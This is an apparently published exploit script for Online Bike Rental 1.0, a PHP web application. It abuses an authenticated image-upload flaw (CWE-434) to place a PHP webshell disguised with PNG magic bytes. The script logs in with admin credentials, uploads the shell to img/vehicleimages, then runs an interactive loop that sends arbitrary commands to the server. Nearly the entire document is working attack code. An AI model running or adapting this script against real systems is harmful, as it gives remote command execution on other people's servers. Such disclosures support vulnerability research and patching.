# Exploit Title: Online Bike Rental 1.0 - Authenticated Remote Code Execution # Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku) # Vulnerability Discovery: Adeeb Shah (@hyd3sec) # Date: 2020-07-31 # Vendor Homepage: ttps://www.sourcecodester.com/php/14374/online-bike-rental-phpmysql.html # Software Link: ttps://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/bikerental-php.zip # Version: 1.0 # CWE-434: Unrestricted Upload of File with Dangerous Type # Overall CVSS Score: 7.2 # CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:F/RL:U/RC:C/CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:H/MUI:N/MS:C/MC:H/MI:H/MA:H # CVSS Base Score: 9.1 | Impact Subscore: 6.0 | Exploitability Subscore: 2.3 # CVSS Temporal Score: 8.9 | CVSS Environmental Score: 7.2 | Modified Impact Subscore: 4.5 # Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7 # Vulnerability Description: # Online Bike Rental v1.0 suffers from an authenticated file upload vulnerability allowing remote attackers # to gain remote code execution (RCE) on the hosting webserver via uploading a maliciously crafted image. import requests, sys, re from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) #proxies = {'http':'','https':''} F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE] S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] info = S[3]+F[5]+'['+S[0]+S[3]+'-'+S[3]+F[5]+']'+S[0]+' ' err = S[3]+F[2]+'['+S[0]+S[3]+'!'+S[3]+F[2]+']'+S[0]+' ' ok = S[3]+F[3]+'['+S[0]+S[3]+'+'+S[3]+F[3]+']'+S[0]+' ' def webshell(SERVER_URL, WEBSHELL_PATH, session): try: WEB_SHELL = SERVER_URL + WEBSHELL_PATH print(info+"Webshell URL: "+ WEB_SHELL) getdir = {'s33k': 'echo %CD%'} req = session.post(url=WEB_SHELL, data=getdir, verify=False) status = req.status_code if status != 200: print(err+"Could not connect to the webshell.") req.raise_for_status() print(ok+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', req.text) cwd = cwd[0]+"> " term = S[3]+F[3]+cwd+F[0] print(S[1]+F[2]+')'+F[4]+'+++++'+F[2]+'['+F[0]+'=========>'+S[0]+S[3]+' hyd3sec & boku '+S[0]+S[1]+'<========'+F[2]+']'+F[4]+'+++++'+F[2]+'('+F[0]+S[0]) while True: cmd = raw_input(term) command = {'s33k': cmd} req = requests.post(WEB_SHELL, data=command, verify=False) status = req.status_code if status != 200: req.raise_for_status() resp= req.text print(resp) except: print('\r\n'+err+'Webshell session failed. Quitting.') sys.exit(-1) def SIG(): SIG = S[1]+" ,(&@@@@* ,@@@@@@%( \n" SIG += " &@@@@@@@@@@@@@@@& @@@@@@@@@@@@@( \n" SIG += " *@@@@@@@@@@@@%@@@@@@ ,, `''@@@/ ,@@ \n" SIG += " @@@@@@@@@# /@@@@@@ #@@@@@@@@@&. * /@@@@@@ \n" SIG += " @@(@@@@@ /@@@@@@ @@@@@@@@@@@@@@@` @@@@@@ @@ \n" SIG += " @@ , @@@@@@@@ #@@@@@@@@@@@@@@ &@@@ %@.\n" SIG += " @@ %@@@@@@@@@@ %@@@@@@@@@@@@@@. /@#\n" SIG += " %@ /@@@@@@@@@@ &@@@@@@@@@@ &@ \n" SIG += " @@ # ...*&@@@@@@@@@@@* @@ \n" SIG += " ,&@@@@& /@@@@"+S[0]+S[3]+"@hyd3sec"+S[0]+S[1]+"@@@@@ (@@@@@% \n" SIG += " @@@@ (@@%@@@@@@@@@/@@ *@@@% \n" SIG += " @@@@@@,*@@@@@ %@@@@@@ \n" SIG += " @@@@@# @ @@@@@% "+S[0]+S[3]+F[4]+" .-----.._ ,--."+S[0]+S[1]+"\n" SIG += " &@@@@@ @@@@@ "+S[0]+S[3]+F[4]+" | .. > ___ | | .--."+S[0]+S[1]+"\n" SIG += " @@@@@@ @@@@@* "+S[1]+" # "+S[0]+S[3]+F[4]+" | |.' ,'-\" \"-. |/ /__ __\n"+S[0]+S[1]+"" SIG += " (@@@@@@@@@@@ "+S[1]+" ##### "+S[0]+S[3]+F[4]+" | < "+F[2]+" * *"+F[4]+" \ / \\/ \\\n"+S[0]+S[1]+"" SIG += " @@&%@@@ @@@ "+S[1]+" # "+S[0]+S[3]+F[4]+" | |> )"+F[2]+" * * *"+F[4]+" / \\ \\\n"+S[0]+S[1]+"" SIG += " @@( @@ @@ "+S[0]+S[3]+F[4]+" |____..- '-."+F[2]+"*"+F[4]+"_"+F[2]+"*"+F[4]+".-'_|\\___|._..\\___\\\n"+S[0]+S[1]+"" SIG += " &* & @ "+S[0]+S[3]+F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0] return SIG def formatHelp(STRING): return S[3]+F[2]+STRING+S[0] def header(): head = S[3]+F[2]+' --- Online Bike Rental 1.0 - Authenticated Remote Code Execution (RCE) ---\n'+S[0] return head if __name__ == "__main__": #1 | INIT print(header()) print(SIG()) if len(sys.argv) != 4: print(err+formatHelp("Usage:\t python %s " % sys.argv[0])) print(err+formatHelp("Example:\t python %s '' 'admin' 'Test@12345'" % sys.argv[0])) sys.exit(-1) # python CLI Arguments SERVER_URL = sys.argv[1] USERNAME = sys.argv[2] PASSWORD = sys.argv[3] # Make sure that URL has a / at end if not re.match(r".*/$", SERVER_URL): SERVER_URL = SERVER_URL+'/' # URLs LOGIN_URL = SERVER_URL + 'admin/index.php' UPLOAD_URL = SERVER_URL + 'admin/changeimage1.php?imgid=1' #2 | Create Session # Create a web session in python s = requests.Session() # GET request to webserver - Start a session & retrieve a session cookie get_session = s.get(LOGIN_URL, verify=False) # Check connection to website & print session cookie to terminal OR die if get_session.status_code == 200: print(ok+'Successfully connected to Bike Rental PHP server & created session.') print(info+"Session Cookie: " + get_session.headers['Set-Cookie']) else: print(err+'Cannot connect to the server and create a web session.') sys.exit(-1) # POST data to login with known admin creds login_data = {'username':USERNAME, 'password':PASSWORD,'login':''} print(info+"Attempting to Login to Bike Rental with credentials: "+USERNAME+":"+PASSWORD) #auth = s.post(url=LOGIN_URL, data=login_data, verify=False, proxies=proxies) auth = s.post(url=LOGIN_URL, data=login_data, verify=False) loginchk = str(re.findall(r'change-password.php', auth.text)) # print(loginchk) # Debug - search login response for successful login if loginchk == "[u'change-password.php']": print(ok+"Login successful.") else: print(err+"Failed login. Check credentials.") sys.exit(-1) #3 | File Upload PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a' # Content-Disposition: form-data; name="img1"; filename="hyd3.php" # Content-Type: image/png websh = { 'img1': ( 'hyd3.php', PNG_magicBytes+'\n'+'', 'image/png', {'Content-Disposition': 'form-data'} ) } fdata = {'update':''} print(info+"Exploiting bike image file upload vulnerability to upload a PHP webshell") #upload_bike = s.post(url=UPLOAD_URL, files=websh, data=fdata, verify=False, proxies=proxies) upload_bike = s.post(url=UPLOAD_URL, files=websh, data=fdata, verify=False) #4 | Get Webshell Upload Name uploadchk = re.findall(r'img/vehicleimages/hyd3.php', upload_bike.text) uploadchk = uploadchk[0] # print(uploadchk) # Debug - Find webshell file upload in response if uploadchk == "img/vehicleimages/hyd3.php": print(ok+"Successfully uploaded webshell") else: print(err+"Webshell upload failed.") sys.exit(-1) webshPath = 'admin/' + uploadchk print(info+"Webshell Filename: " + webshPath) #5 | interact with webshell for Remote Command Execution webshell(SERVER_URL, webshPath, s)